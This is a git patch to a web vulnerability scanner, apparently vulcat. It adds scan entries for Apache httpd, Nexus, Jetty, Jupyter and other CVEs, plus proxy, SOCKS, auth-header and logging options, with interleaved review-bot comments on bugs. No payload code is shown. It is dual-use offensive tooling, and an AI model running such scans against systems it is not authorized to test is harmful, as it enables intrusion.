From c2672d581ff45c312527e07ce557e88bc47f3e3a Mon Sep 17 00:00:00 2001 From: CLincat <3132002932@qq.com> Date: Mon, 5 Sep 2022 12:06:22 +0800 Subject: [PATCH] vulcat-v1.1.3 --- README.md | 54 +- README_en-us.md | 56 +- lib/core/coreScan.py | 92 +-- lib/initial/config.py | 48 +- lib/initial/language.py | 31 +- lib/initial/list.py | 82 +++ lib/initial/parse.py | 18 +- lib/plugins/Exp.py | 21 - lib/plugins/fingerprint/webapp.py | 63 +- lib/report/output.py | 35 ++ lib/tool/check.py | 2 +- lib/tool/logger.py | 71 ++- payloads/ApacheHttpd.py | 314 ++++++++++ payloads/Cisco.py | 2 +- payloads/Django.py | 2 +- payloads/Influxdb.py | 111 ++++ payloads/Jetty.py | 270 +++++++++ payloads/Jupyter.py | 105 ++++ payloads/MiniHttpd.py | 101 ++++ payloads/Nexus.py | 738 ++++++++++++++++++++++++ payloads/demo3.py | 131 +++++ requirements.txt | 9 +- thirdparty/HackRequests/HackRequests.py | 527 +++++++++++++++++ thirdparty/HackRequests/__init__.py | 9 + 24 files changed, 2762 insertions(+), 130 deletions(-) delete mode 100644 lib/plugins/Exp.py create mode 100644 payloads/ApacheHttpd.py create mode 100644 payloads/Influxdb.py create mode 100644 payloads/Jetty.py create mode 100644 payloads/Jupyter.py create mode 100644 payloads/MiniHttpd.py create mode 100644 payloads/Nexus.py create mode 100644 payloads/demo3.py create mode 100644 thirdparty/HackRequests/HackRequests.py create mode 100644 thirdparty/HackRequests/__init__.py diff --git a/README.md b/README.md index eb805eb..63c29a2 100644 --- a/README.md +++ b/README.md @@ -1,12 +1,13 @@ # vulcat +(每月更新)
除了代码写得有亿点点烂, BUG有亿点点多, 误报率有亿点点高, 等亿点点小问题以外,还是阔以的......吧 * vulcat可用于扫描web端漏洞(框架、中间件、CMS等), 发现漏洞时会提示目标url和payload, 使用者可以根据提示对漏洞进行手工验证
-* 使用者还可以自己编写POC, 并添加到vulcat中进行扫描, 本项目也欢迎大家贡献自己的POC(白嫖) +* 使用者还可以自己编写POC, 并添加到vulcat中进行扫描, 本项目也欢迎大家贡献自己的POC * 如果有什么想法、建议或者遇到了BUG, 都可以issues **目前支持扫描的web应用程序有:** -> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Landray-OA, RubyOnRails, Jenkins, Keycloak, mongo-express, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou +> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheHttpd, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Influxdb, RubyOnRails, Jenkins, Jetty, Jupyter, Keycloak, Landray-OA, MiniHttpd, mongo-express, Nexus, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou
目前支持扫描的web漏洞有: [点击展开] @@ -27,6 +28,10 @@ +----------------------+--------------------+--------------+--------------------------------------------------------------------+ | Apache Hadoop | None | unAuth | Hadoop YARN ResourceManager 未授权访问 | +----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Apache Httpd | CVE-2021-40438 | SSRF | Apache HTTP Server 2.4.48 mod_proxy SSRF | +| Apache Httpd | CVE-2021-41773 | FileRead/RCE | Apache HTTP Server 2.4.49 路径遍历 | +| Apache Httpd | CVE-2021-42013 | FileRead/RCE | Apache HTTP Server 2.4.50 路径遍历 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ | Apache Solr | CVE-2021-27905 | SSRF | Solr SSRF/任意文件读取 | +----------------------+--------------------+--------------+--------------------------------------------------------------------+ | Apache Struts2 | S2-001 | RCE | Struts2远程代码执行 | 
@@ -78,14 +83,30 @@ +----------------------+--------------------+--------------+--------------------------------------------------------------------+ | Grafana | CVE-2021-43798 | FileRead | Grafana 8.x 插件模块路径遍历 | +----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Influxdb | None | unAuth | influxdb 未授权访问 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ | Jenkins | CVE-2018-1000861 | RCE | jenkins 远程命令执行 | +----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Jetty | CVE-2021-28164 | DSinfo | jetty 模糊路径信息泄露 | +| Jetty | CVE-2021-28169 | DSinfo | jetty Utility Servlets ConcatServlet 双重解码信息泄露 | +| Jetty | CVE-2021-34429 | DSinfo | jetty 模糊路径信息泄露 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Jupyter | None | unAuth | Jupyter 未授权访问 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ | Keycloak | CVE-2020-10770 | SSRF | 使用request_uri调用未经验证的URL | +----------------------+--------------------+--------------+--------------------------------------------------------------------+ | Landray | CNVD-2021-28277 | FileRead/SSRF| 蓝凌OA 任意文件读取/SSRF | +----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Mini Httpd | CVE-2018-18778 | FileRead | mini_httpd 任意文件读取 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ | mongo-express | CVE-2019-10758 | RCE | 未授权远程代码执行 | +----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Nexus Repository | 
CVE-2019-5475 | RCE | 2.x yum插件 远程命令执行 | +| Nexus Repository | CVE-2019-7238 | RCE | 3.x 远程命令执行 | +| Nexus Repository | CVE-2019-15588 | RCE | 2019-5475的绕过 | +| Nexus Repository | CVE-2020-10199 | RCE | 3.x 远程命令执行 | +| Nexus Repository | CVE-2020-10204 | RCE | 3.x 远程命令执行 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ | Nodejs | CVE-2017-14849 | FileRead | Node.js目录穿越 | | Nodejs | CVE-2021-21315 | RCE | Node.js命令执行 | +----------------------+--------------------+--------------+--------------------------------------------------------------------+ @@ -180,14 +201,29 @@ Options: 线程数 (默认: 2) --delay=DELAY 延迟时间/秒 (默认: 1) --timeout=TIMEOUT 超时时间/秒 (默认: 10) - --http-proxy=HTTP_PROXY - http/https代理 (如: --http-proxy 127.0.0.1:8080) --user-agent=UA 自定义User-Agent - --cookie=COOKIE 添加cookie + --cookie=COOKIE 添加cookie (如: --cookie "PHPSESSID=123456789") + --auth=AUTHORIZATION + 添加Authorization (如: --auth "Basic YWRtaW46YWRtaW4=") + + 日志: + 运行时输出的debug信息 + --log=LOG 日志等级, 可选1-6 (默认: 1) [日志2级: 框架名称+漏洞编号+状态码] [日志3级: 2级内容+请求方法+请求目标+POST数据] [日志4级: 2级内容+请求数据包] [日志5级: 4级内容+响应头] [日志6级: 5级内容+响应内容] + Proxy: + 代理 + + --http-proxy=HTTP_PROXY + http/https代理 (如: --http-proxy 127.0.0.1:8080) + --socks4-proxy=SOCKS4_PROXY + socks4代理(如: --socks4-proxy 127.0.0.1:8080) + --socks5-proxy=SOCKS5_PROXY + socks5代理(如: --socks5-proxy 127.0.0.1:8080 或 + admin:123456@127.0.0.1:8080) + Application: 指定扫描的目标类型 
@@ -229,10 +265,10 @@ Options: --list 查看所有Payload 支持的目标类型(-a参数, 不区分大小写): - AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,conflue - nce,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,jenkins, - keycloak,mongoexpress,nodejs,nodered,showdoc,spring,thinkphp,ueditor,w - eblogic,webmin,yonyou + AliDruid,nacos,airflow,apisix,flink,hadoop,solr,struts2,tomcat,appweb, + confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,g + itea,gitlab,grafana,jenkins,keycloak,landray,mongoexpress,nodejs,noder + ed,rails,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou ``` ## language diff --git a/README_en-us.md b/README_en-us.md index b67389b..436a586 100644 --- a/README_en-us.md +++ b/README_en-us.md @@ -1,11 +1,11 @@ # vulcat - +(Monthly update)
* Vulcat can be used to scan for vulnerabilities on the Web side. When a vulnerability is discovered, the target URL and Payload are prompted. Users can manually verify the vulnerability according to the prompt
* Users can also write their own POC and add it to vulcat for scanning, You are also welcome to contribute your POC to the project * If you have any ideas, suggestions, or bugs, you can issue **Web applications that currently support scanning:** -> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Landray-OA, RubyOnRails, Jenkins, Keycloak, mongo-express, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou +> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheHttpd, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Influxdb, RubyOnRails, Jenkins, Jetty, Jupyter, Keycloak, Landray-OA, MiniHttpd, mongo-express, Nexus, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou
The current web vulnerabilities that support scanning: [Click on] @@ -26,6 +26,10 @@ +----------------------+--------------------+--------------+------------------------------------------------------------+ | Apache Hadoop | None | unAuth | Hadoop YARN ResourceManager unAuthorized | +----------------------+--------------------+--------------+------------------------------------------------------------+ +| Apache Httpd | CVE-2021-40438 | SSRF | Apache HTTP Server 2.4.48 mod_proxy SSRF | +| Apache Httpd | CVE-2021-41773 | FileRead/RCE | Apache HTTP Server 2.4.49 Directory traversal | +| Apache Httpd | CVE-2021-42013 | FileRead/RCE | Apache HTTP Server 2.4.50 Directory traversal | ++----------------------+--------------------+--------------+------------------------------------------------------------+ | Apache Solr | CVE-2021-27905 | SSRF | Solr SSRF/FileRead | +----------------------+--------------------+--------------+------------------------------------------------------------+ | Apache Struts2 | S2-001 | RCE | Struts2 Remote code execution | 
@@ -77,14 +81,30 @@ +----------------------+--------------------+--------------+------------------------------------------------------------+ | Grafana | CVE-2021-43798 | FileRead | Grafana 8.x Directory traversal | +----------------------+--------------------+--------------+------------------------------------------------------------+ +| Influxdb | None | unAuth | influxdb unAuthorized | ++----------------------+--------------------+--------------+------------------------------------------------------------+ | Jenkins | CVE-2018-1000861 | RCE | jenkins Remote code execution | +----------------------+--------------------+--------------+------------------------------------------------------------+ +| Jetty | CVE-2021-28164 | DSinfo | jetty Disclosure information | +| Jetty | CVE-2021-28169 | DSinfo | jetty Utility Servlets ConcatServlet Disclosure information| +| Jetty | CVE-2021-34429 | DSinfo | jetty Disclosure information | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Jupyter | None | unAuth | Jupyter unAuthorized | ++----------------------+--------------------+--------------+------------------------------------------------------------+ | Keycloak | CVE-2020-10770 | SSRF | request_uri SSRF | +----------------------+--------------------+--------------+------------------------------------------------------------+ | Landray | CNVD-2021-28277 | FileRead/SSRF| Landray-OA FileRead/SSRF | +----------------------+--------------------+--------------+------------------------------------------------------------+ +| Mini Httpd | CVE-2018-18778 | FileRead | mini_httpd FileRead | ++----------------------+--------------------+--------------+------------------------------------------------------------+ | mongo-express | CVE-2019-10758 | RCE | Remote code execution | +----------------------+--------------------+--------------+------------------------------------------------------------+ +| Nexus 
Repository | CVE-2019-5475 | RCE | 2.x yum Remote code execution | +| Nexus Repository | CVE-2019-7238 | RCE | 3.x Remote code execution | +| Nexus Repository | CVE-2019-15588 | RCE | 2019-5475 Bypass | +| Nexus Repository | CVE-2020-10199 | RCE | 3.x Remote code execution | +| Nexus Repository | CVE-2020-10204 | RCE | 3.x Remote code execution | ++----------------------+--------------------+--------------+------------------------------------------------------------+ | Nodejs | CVE-2017-14849 | FileRead | Node.js Directory traversal | | Nodejs | CVE-2021-21315 | RCE | Node.js Remote code execution | +----------------------+--------------------+--------------+------------------------------------------------------------+ @@ -179,11 +199,15 @@ Options: The number of threads (default: 2) --delay=DELAY Delay time/s (default: 1) --timeout=TIMEOUT Timeout/s (default: 10) - --http-proxy=HTTP_PROXY - The HTTP/HTTPS proxy (e.g. --http-proxy - 127.0.0.1:8080) --user-agent=UA Customize the User-Agent - --cookie=COOKIE Add a cookie + --cookie=COOKIE Add a cookie (e.g. --cookie "PHPSESSID=123456789") + --auth=AUTHORIZATION + Add a Authorization (e.g. --auth "Basic + YWRtaW46YWRtaW4=") + + Log: + Debug information + --log=LOG The log level, Optional 1-6 (default: 1) [level 2: Framework name + Vulnerability number + status code] [level 3: Level 2 content + request method + request @@ -191,6 +215,18 @@ Options: packet] [Level 5: Level 4 content + response header] [level 6: Level 5 content + response content] + Proxy: + Proxy server + + --http-proxy=HTTP_PROXY + The HTTP/HTTPS proxy (e.g. --http-proxy + 127.0.0.1:8080) + --socks4-proxy=SOCKS4_PROXY + The socks4 proxy(e.g. --socks4-proxy 127.0.0.1:8080) + --socks5-proxy=SOCKS5_PROXY + The socks5 proxy(e.g. --socks5-proxy 127.0.0.1:8080 or + admin:123456@127.0.0.1:8080) + Application: Specify the target type for the scan 
@@ -241,10 +277,10 @@ Options: --list View all payload Supported target types(Case insensitive): - AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,conflue - nce,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,jenkins, - keycloak,mongoexpress,nodejs,nodered,showdoc,spring,thinkphp,ueditor,w - eblogic,webmin,yonyou + AliDruid,nacos,airflow,apisix,flink,hadoop,solr,struts2,tomcat,appweb, + confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,g + itea,gitlab,grafana,jenkins,keycloak,landray,mongoexpress,nodejs,noder + ed,rails,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou ``` ## language diff --git a/lib/core/coreScan.py b/lib/core/coreScan.py index 7aec2f7..e675cd5 100644 --- a/lib/core/coreScan.py +++ b/lib/core/coreScan.py @@ -16,6 +16,8 @@ from payloads.ApacheAirflow import airflow from payloads.ApacheAPISIX import apisix from payloads.ApacheFlink import flink +from payloads.ApacheHadoop import hadoop +from payloads.ApacheHttpd import httpd from payloads.ApacheSolr import solr from payloads.ApacheTomcat import tomcat from payloads.ApacheStruts2 import struts2 @@ -31,12 +33,16 @@ from payloads.Gitea import gitea from payloads.Gitlab import gitlab from payloads.Grafana import grafana -from payloads.ApacheHadoop import hadoop +from payloads.Influxdb import influxdb from payloads.Jenkins import jenkins +from payloads.Jetty import jetty +from payloads.Jupyter import jupyter from payloads.Keycloak import keycloak # from payloads.Kindeditor import kindeditor from payloads.Landray import landray +from payloads.MiniHttpd import minihttpd from payloads.MongoExpress import mongoexpress +from payloads.Nexus import nexus from payloads.Nodejs import nodejs from payloads.NodeRED import nodered from payloads.RubyOnRails import rails 
@@ -79,49 +85,53 @@ def start(self): if (('http://' not in u[0:10]) and ('https://' not in u[0:10])): logger.info('red_ex', self.lang['core']['start']['url_error'].format(u)) continue - - logger.info('green_ex', self.lang['core']['start']['start'] + u) # ? 提示, 开始扫描当前url - # * --------------------WAF指纹识别-------------------- - if (not self.no_waf): - waf_info = waf.identify(u) # * WAF指纹识别 - if waf_info: - while True: - if (not self.batch): # * 是否使用默认选项 - logger.info('red', '', print_end='') - operation = input(self.lang['core']['waf_finger']['waf_find'].format(waf_info)) # * 接收参数 - else: - logger.info('red', self.lang['core']['waf_finger']['waf_find'].format(waf_info), print_end='') - operation = 'no' # * 默认选项No - logger.info('red', 'no', notime=True) - - operation = operation.lower() # * 字母转小写 - if operation in ['y', 'yes']: # * 继续扫描 - logger.info('yellow_ex', self.lang['core']['stop']['continue']) # ? 日志, 继续扫描 - break - elif operation in ['n', 'no']: - logger.info('yellow_ex', self.lang['core']['stop']['next']) # ? 日志, 下一个 - u = 'next' - break - else: - logger.info('yellow_ex', self.lang['core']['waf_finger']['waf_not_find']) + logger.info('green_ex', self.lang['core']['start']['start'] + u) # ? 提示, 开始扫描当前url - if u == 'next': + if check.check_connect(u): + # * --------------------WAF指纹识别-------------------- + if (not self.no_waf): + waf_info = waf.identify(u) # * WAF指纹识别 + if waf_info: + while True: + if (not self.batch): # * 是否使用默认选项 + logger.info('red', '', print_end='') + operation = input(self.lang['core']['waf_finger']['waf_find'].format(waf_info)) # * 接收参数 + else: + logger.info('red', self.lang['core']['waf_finger']['waf_find'].format(waf_info), print_end='') + operation = 'no' # * 默认选项No + logger.info('red', 'no', notime=True) + + operation = operation.lower() # * 字母转小写 + if operation in ['y', 'yes']: # * 继续扫描 + logger.info('yellow_ex', self.lang['core']['stop']['continue']) # ? 
日志, 继续扫描 + break + elif operation in ['n', 'no']: + logger.info('yellow_ex', self.lang['core']['stop']['next']) # ? 日志, 下一个 + u = 'next' + break + else: + logger.info('yellow_ex', self.lang['core']['waf_finger']['waf_not_find']) + + if u == 'next': + continue + # * --------------------WAF指纹识别-------------------- + + # * --------------------框架指纹识别-------------------- + if ((self.application == 'auto') and (not self.vuln)): + logger.info('yellow_ex', self.lang['core']['web_finger']['web']) + webapp.stop = self.stop + new_app_list = webapp.identify(u) + if new_app_list: + logger.info('yellow_ex', self.lang['core']['web_finger']['web_find'].format(str(new_app_list))) + self.app_list = new_app_list + else: + logger.info('yellow_ex', self.lang['core']['web_finger']['web_not_find']) + + # * --------------------框架指纹识别-------------------- + else: + logger.info('red', self.lang['core']['start']['unable'] + u) # ? 提示, 无法访问当前url continue - # * --------------------WAF指纹识别-------------------- - - # * --------------------框架指纹识别-------------------- - if ((self.application == 'auto') and (not self.vuln)): - logger.info('yellow_ex', self.lang['core']['web_finger']['web']) - webapp.stop = self.stop - new_app_list = webapp.identify(u) - if new_app_list: - logger.info('yellow_ex', self.lang['core']['web_finger']['web_find'].format(str(new_app_list))) - self.app_list = new_app_list - else: - logger.info('yellow_ex', self.lang['core']['web_finger']['web_not_find']) - - # * --------------------框架指纹识别-------------------- if self.no_poc: logger.info('red', self.lang['core']['start']['no_poc']) diff --git a/lib/initial/config.py b/lib/initial/config.py index aec9184..e0d9023 100644 --- a/lib/initial/config.py +++ b/lib/initial/config.py @@ -9,6 +9,8 @@ from thirdparty.requests import packages import re import http.client +import socket +import socks global config 
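Review bot: Wrapping the whole WAF and fingerprint section in `if check.check_connect(u):` re-indents roughly forty lines for a single condition; a guard clause keeps both the diff and the nesting flat: `if not check.check_connect(u):` / `logger.info('red', self.lang['core']['start']['unable'] + u)` / `continue`, with the existing body left at its previous indentation. Separately, `self.app_list = new_app_list` narrows the application list for the current target but nothing in this hunk restores it, so with `-f url.txt` a later URL whose fingerprinting fails (the `web_not_find` branch) is scanned with the previous URL's applications unless app_list is reset somewhere outside the hunk — resetting it from the full list at the top of each iteration avoids that carry-over. Using `u = 'next'` as a sentinel overwrites the URL being scanned; a boolean `skip_target` flag would read more clearly. start() continues past the end of the hunk.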
@@ -69,13 +71,36 @@ def __init__(self, args): 'Accept': '*/*', 'Connection': 'close' } + if args.cookie: args.headers['Cookie'] = args.cookie.lstrip('Cookie: ') - args.proxies = { - 'http': args.http_proxy, - 'https': args.http_proxy - } + if args.authorization: + args.headers['Authorization'] = args.authorization.lstrip('Authorization: ') + + if args.http_proxy: # * requests代理 + args.proxies = { + 'http': 'http://' + args.http_proxy, + 'https': 'http://' + args.http_proxy + } + args.proxy = tuple(args.http_proxy.split(':')) # * HackRequests代理 + else: + args.proxies = {} + args.proxy = () + + if args.socks5_proxy: # * socks 5 + if ('@' in args.socks5_proxy): # * 有无身份验证 + proxy_5 = args.socks5_proxy.replace('@', ':').split(':') + socks.set_default_proxy(socks.SOCKS5, proxy_5[2], int(proxy_5[3]), username=proxy_5[0], password=proxy_5[1]) + else: + proxy_5 = args.socks5_proxy.split(':') + socks.set_default_proxy(socks.SOCKS5, proxy_5[0], int(proxy_5[1])) + socket.socket = socks.socksocket + + elif args.socks4_proxy: # * socks 4 + proxy_4 = args.socks4_proxy.split(':') + socks.set_default_proxy(socks.SOCKS4, proxy_4[0], int(proxy_4[1])) + socket.socket = socks.socksocket if args.vuln: args.vuln = args.vuln.lower() @@ -87,15 +112,14 @@ def __init__(self, args): 'discuz', 'django', 'drupal', 'elasticsearch', 'f5bigip', 'fastjson', 'flink', - # 'gitea', 'gitlab', 'grafana', - 'gitea', 'gitlab', - 'hadoop', - 'jenkins', - # 'keycloak', 'kindeditor', - 'keycloak', + 'gitea', 'gitlab', # 'grafana', + 'influxdb', + 'hadoop', 'httpd', + 'jenkins', 'jetty', 'jupyter', + 'keycloak', # 'kindeditor', 'landray', - 'mongoexpress', - 'nacos', 'nodejs', 'nodered', + 'minihttpd', 'mongoexpress', + 'nexus', 'nacos', 'nodejs', 'nodered', 'rails', 'showdoc', 'solr', 'struts2', 'spring', 'thinkphp', 'tomcat', diff --git a/lib/initial/language.py b/lib/initial/language.py index d21eefb..fd389b9 100644 --- a/lib/initial/language.py +++ b/lib/initial/language.py 
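Review bot: `args.authorization.lstrip('Authorization: ')` strips any leading run of the characters A, u, t, h, o, r, i, z, a, n, ':' and space rather than the prefix, so `--auth "token abc"` is sent as `ken abc` with no error; the pre-existing `args.cookie.lstrip('Cookie: ')` context line has the same bug. Use a real prefix check, e.g. `re.sub(r'^Authorization:\s*', '', args.authorization, flags=re.I)` (re is already imported in this file) and the equivalent for `Cookie:`. The SOCKS5 parser replaces `@` with `:` and then splits on `:`, so a password containing either character, or an IPv6 host, yields an IndexError or mis-ordered fields; `rpartition('@')` followed by `rsplit(':', 1)` on each half is more robust, and a malformed value (including one without a port) should fail with a clear message instead of a traceback from `int()`. Note that `socket.socket = socks.socksocket` patches every socket process-wide, so combining `--http-proxy` with a SOCKS option tunnels the HTTP proxy connection itself through SOCKS; if that is not intended, reject the combination up front.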
@@ -26,11 +26,23 @@ def language(): 'thread': 'The number of threads (default: 2)', 'delay': 'Delay time/s (default: 1)', 'timeout': 'Timeout/s (default: 10)', - 'http_proxy': 'The HTTP/HTTPS proxy (e.g. --http-proxy 127.0.0.1:8080)', 'user_agent': 'Customize the User-Agent', - 'cookie': 'Add a cookie', + 'cookie': 'Add a cookie (e.g. --cookie "PHPSESSID=123456789")', + 'Authorization': 'Add a Authorization (e.g. --auth "Basic YWRtaW46YWRtaW4=")', + }, + 'log_help': { + 'title': 'Log', + 'name': 'Debug information', 'log': 'The log level, Optional 1-6 (default: 1) [level 2: Framework name + Vulnerability number + status code] [level 3: Level 2 content + request method + request target +POST data] [level 4: Level 2 content + request packet] [Level 5: Level 4 content + response header] [level 6: Level 5 content + response content]' }, + 'proxy_help': { + 'title': 'Proxy', + 'name': 'Proxy server', + 'http_proxy': 'The HTTP/HTTPS proxy (e.g. --http-proxy 127.0.0.1:8080)', + 'socks4_proxy': 'The socks4 proxy(e.g. --socks4-proxy 127.0.0.1:8080)', + 'socks5_proxy': 'The socks5 proxy(e.g. --socks5-proxy 127.0.0.1:8080 or admin:123456@127.0.0.1:8080)', + + }, 'application_help': { 'title': 'Application', 'name': 'Specify the target type for the scan', 
@@ -141,11 +153,22 @@ def language(): 'thread': '线程数 (默认: 2)', 'delay': '延迟时间/秒 (默认: 1)', 'timeout': '超时时间/秒 (默认: 10)', - 'http_proxy': 'http/https代理 (如: --http-proxy 127.0.0.1:8080)', 'user_agent': '自定义User-Agent', - 'cookie': '添加cookie', + 'cookie': '添加cookie (如: --cookie "PHPSESSID=123456789")', + 'Authorization': '添加Authorization (如: --auth "Basic YWRtaW46YWRtaW4=")' + }, + 'log_help': { + 'title': '日志', + 'name': '运行时输出的debug信息', 'log': '日志等级, 可选1-6 (默认: 1) [日志2级: 框架名称+漏洞编号+状态码] [日志3级: 2级内容+请求方法+请求目标+POST数据] [日志4级: 2级内容+请求数据包] [日志5级: 4级内容+响应头] [日志6级: 5级内容+响应内容]' }, + 'proxy_help': { + 'title': 'Proxy', + 'name': '代理', + 'http_proxy': 'http/https代理 (如: --http-proxy 127.0.0.1:8080)', + 'socks4_proxy': 'socks4代理(如: --socks4-proxy 127.0.0.1:8080)', + 'socks5_proxy': 'socks5代理(如: --socks5-proxy 127.0.0.1:8080 或 admin:123456@127.0.0.1:8080)', + }, 'application_help': { 'title': 'Application', 'name': '指定扫描的目标类型', diff --git a/lib/initial/list.py b/lib/initial/list.py index 9311be5..db6ccbc 100644 --- a/lib/initial/list.py +++ b/lib/initial/list.py @@ -74,6 +74,23 @@ def list(): 'description': 'Hadoop YARN ResourceManager 未授权访问' } ], + 'Apache Httpd': [ + { + 'vul_id': 'CVE-2021-40438', + 'type': 'SSRF', + 'description': 'Apache HTTP Server 2.4.48 mod_proxy SSRF ' + }, + { + 'vul_id': 'CVE-2021-41773', + 'type': 'FileRead/RCE', + 'description': 'Apache HTTP Server 2.4.49 路径遍历' + }, + { + 'vul_id': 'CVE-2021-42013', + 'type': 'FileRead/RCE', + 'description': 'Apache HTTP Server 2.4.50 路径遍历' + } + ], 'Apache Solr': [ { 'vul_id': 'CVE-2021-27905', @@ -284,6 +301,13 @@ def list(): 'description': 'Grafana 8.x 插件模块路径遍历' }, ], + 'Influxdb': [ + { + 'vul_id': 'None', + 'type': 'unAuth', + 'description': 'influxdb 未授权访问' + }, + ], 'Jenkins': [ { 'vul_id': 'CVE-2018-1000861', 
@@ -291,6 +315,30 @@ def list(): 'description': 'jenkins 远程命令执行' } ], + 'Jetty': [ + { + 'vul_id': 'CVE-2021-28164', + 'type': 'DSinfo', + 'description': 'jetty 模糊路径信息泄露' + }, + { + 'vul_id': 'CVE-2021-28169', + 'type': 'DSinfo', + 'description': 'jetty Utility Servlets ConcatServlet 双重解码信息泄露' + }, + { + 'vul_id': 'CVE-2021-34429', + 'type': 'DSinfo', + 'description': 'jetty 模糊路径信息泄露' + } + ], + 'Jupyter': [ + { + 'vul_id': 'None', + 'type': 'unAuth', + 'description': 'Jupyter 未授权访问' + } + ], 'Keycloak': [ { 'vul_id': 'CVE-2020-10770', @@ -313,6 +361,13 @@ def list(): 'description': '蓝凌OA 任意文件读取/SSRF' } ], + 'Mini Httpd': [ + { + 'vul_id': 'CVE-2018-18778', + 'type': 'FileRead', + 'description': 'mini_httpd 任意文件读取' + } + ], 'mongo-express': [ { 'vul_id': 'CVE-2019-10758', @@ -320,6 +375,33 @@ def list(): 'description': '未授权远程代码执行' } ], + 'Nexus Repository': [ + { + 'vul_id': 'CVE-2019-5475', + 'type': 'RCE', + 'description': '2.x yum插件 远程命令执行' + }, + { + 'vul_id': 'CVE-2019-7238', + 'type': 'RCE', + 'description': '3.x 远程命令执行' + }, + { + 'vul_id': 'CVE-2019-15588', + 'type': 'RCE', + 'description': '2019-5475的绕过' + }, + { + 'vul_id': 'CVE-2020-10199', + 'type': 'RCE', + 'description': '3.x 远程命令执行' + }, + { + 'vul_id': 'CVE-2020-10204', + 'type': 'RCE', + 'description': '3.x 远程命令执行' + } + ], 'Nodejs': [ { 'vul_id': 'CVE-2017-14849', diff --git a/lib/initial/parse.py b/lib/initial/parse.py index 6e4a82f..7321c83 100644 --- a/lib/initial/parse.py +++ b/lib/initial/parse.py @@ -19,7 +19,7 @@ def parse(): python3 vulcat.py -u https://www.example.com/ -a tomcat -v CVE-2017-12615 python3 vulcat.py -f url.txt -t 10 python3 vulcat.py --list -''', version='vulcat.py-1.1.2\n') +''', version='vulcat.py-1.1.3\n') # * 指定目标 target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name']) target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url']) 
@@ -31,16 +31,25 @@ def parse(): optional.add_option('-t', '--thread', type='int', dest='thread', default=2, help=lang['optional_help']['thread']) optional.add_option('--delay', type='float', dest='delay', default=1, help=lang['optional_help']['delay']) optional.add_option('--timeout', type='int', dest='timeout', default=10, help=lang['optional_help']['timeout']) - optional.add_option('--http-proxy', type='string', dest='http_proxy', default=None, help=lang['optional_help']['http_proxy']) optional.add_option('--user-agent', type='string', dest='ua', default='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0', help=lang['optional_help']['user_agent']) optional.add_option('--cookie', type='string', dest='cookie', default=None, help=lang['optional_help']['cookie']) - optional.add_option('--log', type='int', dest='log', default=1, help=lang['optional_help']['log']) + optional.add_option('--auth', type='string', dest='authorization', default=None, help=lang['optional_help']['Authorization']) + # optional.add_option('--random-ua', dest='random_ua', action='store_true', help='') + + # * 日志参数 + log = parser.add_option_group(lang['log_help']['title'], lang['log_help']['name']) + log.add_option('--log', type='int', dest='log', default=1, help=lang['log_help']['log']) + + # * 代理 + proxy = parser.add_option_group(lang['proxy_help']['title'], lang['proxy_help']['name']) + proxy.add_option('--http-proxy', type='string', dest='http_proxy', default=None, help=lang['proxy_help']['http_proxy']) + proxy.add_option('--socks4-proxy', type='string', dest='socks4_proxy', default=None, help=lang['proxy_help']['socks4_proxy']) + proxy.add_option('--socks5-proxy', type='string', dest='socks5_proxy', default=None, help=lang['proxy_help']['socks5_proxy']) # * 指定目标类型 application = parser.add_option_group(lang['application_help']['title'], lang['application_help']['name']) application.add_option('-a', '--application', type='string', dest='application', 
